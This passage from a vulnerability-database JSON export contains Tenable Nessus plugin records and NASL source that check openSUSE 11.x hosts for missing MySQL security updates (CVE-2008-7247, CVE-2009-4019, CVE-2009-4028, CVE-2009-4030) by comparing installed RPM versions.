reference:\"libmysqlclient15-32bit-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.51a-27.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:06:05", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)", "edition": 25, "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:libmysqlclient16-32bit", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mysql-ndb-storage", "p-cpe:/a:novell:opensuse:mysql-ndb-management", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient16", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:mysql-ndb-tools", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:mysql-ndb-extra", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r16", "p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit", "p-cpe:/a:novell:opensuse:mysql-bench"], "id": "SUSE_11_2_LIBMYSQLCLIENT-DEVEL-100401.NASL", "href": "https://www.tenable.com/plugins/nessus/46235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46235);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient-devel-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient16-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient_r16-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqld-devel-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-bench-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-client-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-debug-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-extra-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-management-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-storage-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-tools-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-test-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-tools-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient16-32bit-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r16-32bit-5.1.36-6.8.8\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient16 / libmysqlclient16-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:03:30", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)", "edition": 25, "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_0_LIBMYSQLCLIENT-DEVEL-100504.NASL", "href": "https://www.tenable.com/plugins/nessus/46229", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46229);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient-devel-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient15-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient_r15-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-Max-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-bench-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-client-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-debug-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-tools-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.51a-27.8\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:04:47", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 25, "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-04T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_1_LIBMYSQLCLIENT-DEVEL-091216.NASL", "href": "https://www.tenable.com/plugins/nessus/46219", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46219);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient-devel-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient15-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient_r15-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-Max-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-bench-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-client-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-debug-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-test-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-tools-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-12.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:06:05", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 25, "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-04T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:libmysqlclient16-32bit", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mysql-ndb-storage", "p-cpe:/a:novell:opensuse:mysql-ndb-management", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient16", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:mysql-ndb-tools", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:mysql-ndb-extra", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r16", "p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit", "p-cpe:/a:novell:opensuse:mysql-bench"], "id": "SUSE_11_2_LIBMYSQLCLIENT-DEVEL-091215.NASL", "href": "https://www.tenable.com/plugins/nessus/46220", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46220);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit\");\n script_set_attribute(attribute:\"cpe\", 